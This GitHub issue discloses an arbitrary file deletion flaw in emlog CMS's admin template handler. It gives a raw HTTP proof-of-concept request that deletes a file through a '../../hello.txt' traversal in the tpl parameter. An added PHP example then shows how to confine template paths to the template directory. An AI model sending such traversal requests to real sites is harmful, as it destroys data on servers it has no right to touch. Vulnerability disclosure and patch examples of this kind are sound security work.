emlogcms has an arbitrary file deletion vulnerability #1

Open
QianGeG opened this issue Jun 23, 2023 · 0 comments
QianGeG commented Jun 23, 2023

First, log in to the home page of the background using the administrator account.
Open the admin\template.php template.

../../hello.txt: this location is the root directory file to be deleted.

PoC:

```http
GET /emlog/admin/template.php?action=del&tpl=../../hello.txt&token=c5bc68077f6da2a911df58e6cde92cbc2d0514fd HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://127.0.0.1/emlog/admin/template.php
Cookie: PHPSESSID=kqfrmmnndterp04rl0cv9ls613; EM_AUTHCOOKIE_RNrgNg46hg86lUoT8Hg8Vht92Y3yU9rn=123123%7C0%7Cf98ccd4c0c66a0922a0e077a24088ba0
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
```
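
Added example, not part of the original report and not emlog's own code: one way a template-deletion handler can confine the `tpl` value to a single directory directly under the template root before anything is removed. The helper name `resolve_template_dir`, the allowed-character rule and the scratch directory layout are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helper (not emlog's code): map the `tpl` request value to a
// directory directly inside $templateRoot, or return null to refuse it.
function resolve_template_dir(string $templateRoot, string $tpl): ?string
{
    // Assumed naming rule: one path component made of letters, digits, "_",
    // "-" and ".". This rejects "/", "\", NUL bytes and empty input.
    if (preg_match('/\A[A-Za-z0-9_.-]+\z/', $tpl) !== 1 || $tpl === '.' || $tpl === '..') {
        return null;
    }

    $root = realpath($templateRoot);
    if ($root === false) {
        return null;
    }

    // realpath() resolves symlinks and ".." so the check below runs on the
    // canonical location, not on the string the client sent.
    $target = realpath($root . DIRECTORY_SEPARATOR . $tpl);
    if ($target === false || !is_dir($target)) {
        return null;
    }

    // Containment: the resolved directory must be a direct child of the root.
    return dirname($target) === $root ? $target : null;
}

// Constructed demo tree: one template, plus a file two levels above the
// template root, matching the ../../hello.txt shape in the report.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'tpl_demo_' . bin2hex(random_bytes(4));
$root = $base . '/content/templates';
mkdir($root . '/default', 0700, true);
file_put_contents($base . '/hello.txt', 'keep me');

foreach (['default', '../../hello.txt', '..', 'default/../..', 'missing'] as $tpl) {
    $dir = resolve_template_dir($root, $tpl);
    printf("%-16s => %s\n", $tpl, $dir === null ? 'rejected' : 'allowed');
}

// Remove the scratch tree.
unlink($base . '/hello.txt');
rmdir($root . '/default');
rmdir($root);
rmdir($base . '/content');
rmdir($base);
```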
